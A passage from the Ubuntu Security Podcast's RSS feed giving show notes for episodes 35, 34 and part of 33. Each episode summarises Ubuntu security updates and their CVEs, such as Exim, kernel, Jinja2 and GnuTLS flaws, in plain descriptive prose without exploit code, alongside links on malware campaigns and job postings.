        <googleplay:description>We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>34 unique CVEs addressed</p>
<h3 id="usn-4002-1-doxygen-vulnerability">[<a href="https://usn.ubuntu.com/4002-1/">USN-4002-1</a>] Doxygen vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-10245">CVE-2016-10245</a></li>
</ul>
</li>
<li>Generates HTML code documentation from code comments</li>
<li>Includes a field to search across the documentation</li>
<li>Doesn&rsquo;t treat this as untrusted input and blindly displays the input in resulting pages
<ul>
<li>Allows possible XSS or iframe injection</li>
</ul>
</li>
<li>Fix is simple - whitelist allowed characters to avoid injection etc</li>
</ul>
<h3 id="usn-4003-1-qt-vulnerabilities">[<a href="https://usn.ubuntu.com/4003-1/">USN-4003-1</a>] Qt vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19873">CVE-2018-19873</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19870">CVE-2018-19870</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15518">CVE-2018-15518</a></li>
</ul>
</li>
<li>3 likely DoS issues:
<ul>
<li>Buffer overflow when handling invalid BMP images - didn&rsquo;t check for valid
/ sensible width or height parameters</li>
<li>NULL pointer dereference on malformed GIF images</li>
<li>Double free when parsing a specially crafted (illegal format) XML
document</li>
</ul>
</li>
</ul>
<h3 id="usn-4004-1-usn-4004-2-berkeley-db-vulnerability">[<a href="https://usn.ubuntu.com/4004-1/">USN-4004-1</a>, <a href="https://usn.ubuntu.com/4004-2/">USN-4004-2</a>] Berkeley DB vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8457">CVE-2019-8457</a></li>
</ul>
</li>
<li>Contains an embedded copy of sqlite which was vulnerable to a heap-based
out-of-bounds read when handling invalid rtree tables</li>
</ul>
<h3 id="usn-4005-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4005-1/">USN-4005-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11810">CVE-2019-11810</a></li>
</ul>
</li>
<li>Reliable Datagram Sockets (RDS) module was vulnerable to a race-condition
during network namespace cleanup that could lead to a UAF.
<ul>
<li>RDS is blacklisted by default in Ubuntu AND this is only able to be
exploited by a local attacker</li>
</ul>
</li>
<li>NULL pointer dereference in LSI Logic MegaRAID driver</li>
</ul>
<h3 id="usn-4006-1-usn-4006-2-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4006-1/">USN-4006-1</a>, <a href="https://usn.ubuntu.com/4006-2/">USN-4006-2</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic &amp; Bionic HWE
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11191">CVE-2019-11191</a></li>
</ul>
</li>
<li>Old a.out binary format for 32-bit platforms - so only affects i386
kernel users, and only affects setuid a.out binaries (none in archive)</li>
<li>Kernel would not setup permissions early enough and so could allow ASLR
to be bypassed, weakening system protections to then more easily exploit
some other existing vulnerablity in the given setuid a.out binary</li>
<li>Have also disabled a.out support in general going forward as this is a
relic of the past</li>
</ul>
<h3 id="usn-4007-1-usn-4007-2-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4007-1/">USN-4007-1</a>, <a href="https://usn.ubuntu.com/4007-2/">USN-4007-2</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic &amp; Xenial HWE
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11191">CVE-2019-11191</a></li>
</ul>
</li>
<li>Same a.out issue</li>
</ul>
<h3 id="usn-4008-1-usn-4008-3-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4008-1/">USN-4008-1</a>, <a href="https://usn.ubuntu.com/4008-3/">USN-4008-3</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Trusty ESM (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11191">CVE-2019-11191</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11810">CVE-2019-11810</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11190">CVE-2019-11190</a></li>
</ul>
</li>
<li>a.out issue, plus RDS and MegaRAID NULL ptr dereference</li>
<li>Similar to a.out issue, in general ASLR could be bypassed on setuid
binaries due to a similar race-condition</li>
<li>This fix also requires some AppArmor profile changes</li>
</ul>
<h3 id="usn-4008-2-apparmor-update">[<a href="https://usn.ubuntu.com/4008-2/">USN-4008-2</a>] AppArmor update</h3>
<ul>
<li>4 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11191">CVE-2019-11191</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11810">CVE-2019-11810</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11190">CVE-2019-11190</a></li>
</ul>
</li>
<li>Updated AppArmor profiles to handle new kernel behavoiur as a result of
the fix for CVE-2019-11190 (ASLR bypass on setuid executables).</li>
<li>When executing a binary, will then appear to require mmap privileges of
the resulting binary, so ensure all current profiles are updated to add
this permission on the appropriate rules</li>
</ul>
<h3 id="usn-4009-1-usn-4009-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/4009-1/">USN-4009-1</a>, <a href="https://usn.ubuntu.com/4009-2/">USN-4009-2</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM</li>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11040">CVE-2019-11040</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11039">CVE-2019-11039</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11036">CVE-2019-11036</a></li>
</ul>
</li>
<li>Heap buffer overflow in handling crafted JPEG files</li>
<li>Integer overflow, leading to possible OOB read when handling crafted mime
encoded data</li>
<li>(Xenial, Bionic, Cosmic and Disco only) - OOB read when handling crafted
EXIF data -&gt; crash, DoS or possible information disclosure form other
memory</li>
</ul>
<h3 id="usn-4010-1-exim-vulnerability">[<a href="https://usn.ubuntu.com/4010-1/">USN-4010-1</a>] Exim vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10149">CVE-2019-10149</a></li>
</ul>
</li>
<li>Possible remote exploit of popular MTA</li>
<li>Embargo broke early - was expected to be public 11th June - as a
consequence, we released our update once the details were publicly known
<ul>
<li>It was possible to include shell directives in the recipients email
address which would be evaluated by the exim process (and hence as
root) - but would require the attacker to keep a connection open to the
server for 7 days by transmitting 1 byte every few minutes.</li>
</ul>
</li>
</ul>
<h3 id="usn-3957-3-mariadb-vulnerabilities">[<a href="https://usn.ubuntu.com/3957-3/">USN-3957-3</a>] MariaDB vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2627">CVE-2019-2627</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2614">CVE-2019-2614</a></li>
</ul>
</li>
<li>Corresponding fixes for flaws originally reported in MySQL - fixed in
MariaDB (community maintained fork of MySQL) - <a href="https://ubuntusecuritypodcast.org/episode-30/">Episode 30</a></li>
</ul>
<h3 id="usn-4011-1-usn-4011-2-jinja2-vulnerabilities">[<a href="https://usn.ubuntu.com/4011-1/">USN-4011-1</a>, <a href="https://usn.ubuntu.com/4011-2/">USN-4011-2</a>] Jinja2 vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10906">CVE-2019-10906</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10745">CVE-2016-10745</a></li>
</ul>
</li>
<li>Sandbox is used when rendering user-provided templates (ie untrusted)</li>
<li>Possible to escape the sandbox by reading arbitrary python objects via
Python&rsquo;s internal string format method (by referencing the <!-- raw HTML omitted --><!-- raw HTML omitted -->globals<!-- raw HTML omitted --><!-- raw HTML omitted -->
array)</li>
<li>Was originally fixed in 2016 for the str.format method - but at the time
missed the similar str.format_map method - so both fixed in this update</li>
</ul>
<h3 id="usn-3991-2-firefox-regression">[<a href="https://usn.ubuntu.com/3991-2/">USN-3991-2</a>] Firefox regression</h3>
<ul>
<li>17 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9816">CVE-2019-9816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11698">CVE-2019-11698</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11697">CVE-2019-11697</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9821">CVE-2019-9821</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9820">CVE-2019-9820</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9819">CVE-2019-9819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9817">CVE-2019-9817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9814">CVE-2019-9814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9800">CVE-2019-9800</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11701">CVE-2019-11701</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11699">CVE-2019-11699</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11696">CVE-2019-11696</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11695">CVE-2019-11695</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11693">CVE-2019-11693</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11692">CVE-2019-11692</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11691">CVE-2019-11691</a></li>
</ul>
</li>
<li>Previous FF 67.0 had broken code for checking versions on upgrades, and
could potentially think you had downgraded the browser when it was in
fact upgraded and therefore think the old profile data was invalid</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-about-recent-malware-campaigns">Alex and Joe talk about recent malware campaigns</h3>
<ul>
<li><a href="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/">https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/</a></li>
<li><a href="https://thehackernews.com/2019/05/hacking-mysql-phpmyadmin.html">https://thehackernews.com/2019/05/hacking-mysql-phpmyadmin.html</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-certifications-engineer">Security Certifications Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1660658">https://boards.greenhouse.io/canonical/jobs/1660658</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E035.mp3" length="NUM_BYTES" type="audio/mpeg" /><itunes:duration>MM:SS</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 34
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-34/</link>
          <pubDate>Mon, 03 Jun 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E034.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 34</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.</itunes:summary>
        <description>This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.</description>
        <googleplay:description>This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>32 unique CVEs addressed</p>
<h3 id="usn-3976-3-usn-3976-4-samba-regression">[<a href="https://usn.ubuntu.com/3976-3/">USN-3976-3</a>, <a href="https://usn.ubuntu.com/3976-4/">USN-3976-4</a>] Samba regression</h3>
<ul>
<li>Affecting Trusty ESM, Xenial, Bionic</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-32/">Episode 32</a> - discussed privilege escalation vuln and fix for Samba</li>
<li>Original update caused a regression where Samba might crash - fixed</li>
</ul>
<h3 id="usn-3994-1-gnome-desktop-vulnerability">[<a href="https://usn.ubuntu.com/3994-1/">USN-3994-1</a>] gnome-desktop vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11460">CVE-2019-11460</a></li>
</ul>
</li>
<li>Thumbnailers could possibly escape bubblewrap sandbox by using TIOCSTI
ioctl to send characters to the controlling terminals input buffer and
hence escape the sandbox
<ul>
<li>Requires to compromise a thumbnailer in the first place so less impact</li>
<li>Similar to <a href="https://ubuntu.com/security/CVE-2019-10063">CVE-2019-10063</a> for flatpak and <a href="https://ubuntu.com/security/CVE-2019-7303">CVE-2019-7303</a> for snapd</li>
</ul>
</li>
</ul>
<h3 id="usn-3995-1-usn-3995-2-keepalived-vulnerability">[<a href="https://usn.ubuntu.com/3995-1/">USN-3995-1</a>, <a href="https://usn.ubuntu.com/3995-2/">USN-3995-2</a>] Keepalived vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19115">CVE-2018-19115</a></li>
</ul>
</li>
<li>Heap based buffer overflow when parsing HTTP response code - would
potentially write an unlimited amount of attacker controlled data to the
heap for a 10-byte long buffer</li>
<li>Crash -&gt; DoS, RCE</li>
<li>Fixed to properly parse and expect at most a 3 digit long response code</li>
</ul>
<h3 id="usn-3845-2-freerdp-vulnerabilities">[<a href="https://usn.ubuntu.com/3845-2/">USN-3845-2</a>] FreeRDP vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8789">CVE-2018-8789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8788">CVE-2018-8788</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8787">CVE-2018-8787</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8786">CVE-2018-8786</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8785">CVE-2018-8785</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8784">CVE-2018-8784</a></li>
</ul>
</li>
<li>Back in December published update for FreeRDP (USN-3845-1 - <a href="https://ubuntusecuritypodcast.org/episode-16/">Episode 16</a>)
<ul>
<li>In Bionic and Cosmic freerdp2 is in main, so that update was for freerdp2</li>
<li>This update is for freerdp (v1), which is in universe in bionic + cosmic</li>
<li>Corresponding update</li>
</ul>
</li>
</ul>
<h3 id="usn-3997-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/3997-1/">USN-3997-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18511">CVE-2018-18511</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11698">CVE-2019-11698</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9816">CVE-2019-9816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5798">CVE-2019-5798</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9820">CVE-2019-9820</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9819">CVE-2019-9819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9817">CVE-2019-9817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9800">CVE-2019-9800</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9797">CVE-2019-9797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11693">CVE-2019-11693</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11692">CVE-2019-11692</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11691">CVE-2019-11691</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18511">CVE-2019-18511</a></li>
</ul>
</li>
<li>Thunderbird 60.7.0 - latest upstream release includes a heap of security fixes</li>
<li>Most all come from Firefox (DoS, bypass same-origin restrictions or RCE)</li>
</ul>
<h3 id="usn-3996-1-gnu-screen-vulnerability">[<a href="https://usn.ubuntu.com/3996-1/">USN-3996-1</a>] GNU Screen vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-6806">CVE-2015-6806</a></li>
</ul>
</li>
<li>Old low priority issue fixed for ESM releases (fixed back in 2015
upstream so screen in Xenial, Bionic etc not affected)</li>
<li>Attacker could cause a crash due to stack overrun via recursion due to
large number of repeated ANSI escape sequences in output</li>
</ul>
<h3 id="usn-3968-2-sudo-vulnerability">[<a href="https://usn.ubuntu.com/3968-2/">USN-3968-2</a>] Sudo vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-1000368">CVE-2017-1000368</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-31/">Episode 31</a> - updated sudo in xenial - corresponding update for Trusty ESM</li>
</ul>
<h3 id="usn-3998-1-evolution-data-server-vulnerability">[<a href="https://usn.ubuntu.com/3998-1/">USN-3998-1</a>] Evolution Data Server vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15587">CVE-2018-15587</a></li>
</ul>
</li>
<li>Research from Marcus Brinkmann showed it was possible to create an
encrypted email with a zero-length encrypted section along with
unencrypted contents which Evolution (and other email clients) would show
as being encrypted.</li>
<li>Mail clients call out to gpg (gnupg) to decrypt the email but are lax in
parsing GPGs output and so confuse the whole email as being encrypted</li>
<li>Due to SW arch of evolution, part of this fix is done in Evolution itself
(to better highlight to the user that the email contains unencrypted
portions) and part is done in the backend (Evolution Data Server) to
properly parse output of gnupg</li>
</ul>
<h3 id="usn-3999-1-gnutls-vulnerabilities">[<a href="https://usn.ubuntu.com/3999-1/">USN-3999-1</a>] GnuTLS vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3836">CVE-2019-3836</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3829">CVE-2019-3829</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10846">CVE-2018-10846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10845">CVE-2018-10845</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10844">CVE-2018-10844</a></li>
</ul>
</li>
<li>3 CVEs related to &ldquo;Lucky Thirteen&rdquo; attack (originally published in 2013)
<ul>
<li>Timing attack against TLS implementations that use CBC</li>
<li>One countermeasure was to use &ldquo;psuedo constant time&rdquo;</li>
<li>New research showed this is not sufficient (incidentally one of the
researchers was Adi Shamir, co-inventor of the RSA algorithm - the &ldquo;S&rdquo;
in RSA)</li>
</ul>
</li>
<li>1 CVE from Tavis Ormandy (double-free when handling X.509 certificates) -
crash -&gt; DoS, code execution</li>
<li>Last CVE - uninitialized pointer could be dereferenced when handling
certain post-handshake messages - likely crash -&gt; DoS</li>
</ul>
<h3 id="usn-4000-1-corosync-vulnerability">[<a href="https://usn.ubuntu.com/4000-1/">USN-4000-1</a>] Corosync vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1084">CVE-2018-1084</a></li>
</ul>
</li>
<li>Integer overflow leading to a buffer overflow (read), able to be
triggered by an unauthenticated user - crash -&gt; DoS</li>
</ul>
<h3 id="usn-4001-1-usn-4001-2-libseccomp-vulnerability">[<a href="https://usn.ubuntu.com/4001-1/">USN-4001-1</a>, <a href="https://usn.ubuntu.com/4001-2/">USN-4001-2</a>] libseccomp vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9893">CVE-2019-9893</a></li>
</ul>
</li>
<li>Seccomp allows to write policies to act on system calls arguments via
BPF - includes comparison operators like less than (LT) etc - Jann Horn
discovered that on 64-bit platforms it did not generate correct BPF to
perform comparisons correctly</li>
<li>In this case, the updates from upstream relied on other upstream changes
so we chose to upgrade seccomp entirely rather than try and backport the
fixes as they were too involved and so less risk overall in upgrading the
version than in backporting</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-about-insider-threats">Alex and Joe talk about insider threats</h3>
<ul>
<li><a href="https://threatpost.com/snapchat-privacy-blunder-piques-concerns-about-insider-threats/145074/">https://threatpost.com/snapchat-privacy-blunder-piques-concerns-about-insider-threats/145074/</a></li>
<li><a href="https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=484738">https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=484738</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="security-certifications-engineer">Security Certifications Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1660658">https://boards.greenhouse.io/canonical/jobs/1660658</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E034.mp3" length="22679837" type="audio/mpeg" /><itunes:duration>23:37</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 33
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-33/</link>
          <pubDate>Mon, 27 May 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E033.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 33</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for
  vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk
  configuration of virtualised guests to mitigate speculative execution
  vulnerabilities as well as plans for...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for
  vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk
  configuration of virtualised guests to mitigate speculative execution
  vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.
  </itunes:summary>
        <description>  Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for
  vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk
  configuration of virtualised guests to mitigate speculative execution
  vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.
  </description>
        <googleplay:description>  Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for
  vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk
  configuration of virtualised guests to mitigate speculative execution
  vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for
vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk
configuration of virtualised guests to mitigate speculative execution
vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>43 unique CVEs addressed</p>
<h3 id="usn-3977-2-intel-microcode-update">[<a href="https://usn.ubuntu.com/3977-2/">USN-3977-2</a>] Intel Microcode update</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
<li>Corresponding Intel microcode updates for Cherry Trail and Bay Trail CPU families</li>
</ul>
<h3 id="usn-3989-1-libraw-vulnerabilities">[<a href="https://usn.ubuntu.com/3989-1/">USN-3989-1</a>] LibRaw vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5819">CVE-2018-5819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5818">CVE-2018-5818</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5817">CVE-2018-5817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20365">CVE-2018-20365</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20364">CVE-2018-20364</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20363">CVE-2018-20363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20337">CVE-2018-20337</a></li>
</ul>
</li>
<li>Multiple issues fixed:
<ul>
<li>2*NULL pointer dereference</li>
<li>Heap-based buffer overflow</li>
<li>Stack-based buffer overflow</li>
<li>3 different cases of possible infinite loop - CPU DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-3990-1-urllib3-vulnerabilities">[<a href="https://usn.ubuntu.com/3990-1/">USN-3990-1</a>] urllib3 vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11324">CVE-2019-11324</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11236">CVE-2019-11236</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20060">CVE-2018-20060</a></li>
</ul>
</li>
<li>When validating certs for HTTPS, could specify a set of certs to validate
against - however it would always include the system CA certs as well -
so could validate successfully even if cert is not in chain of explicitly
desired set - fixed to NOT include system certs in this case</li>
<li>Possible CRLF injection</li>
<li>Would possibly expose HTTP authorization credentials across different
origin hosts as after authenticating, if being redirected to a different
origin host, would still include the Authorization header from the old
host to the new host - fixed by ensuring this defaults to being off</li>
</ul>
<h3 id="usn-3991-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3991-1/">USN-3991-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9816">CVE-2019-9816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11698">CVE-2019-11698</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11697">CVE-2019-11697</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9821">CVE-2019-9821</a></li>
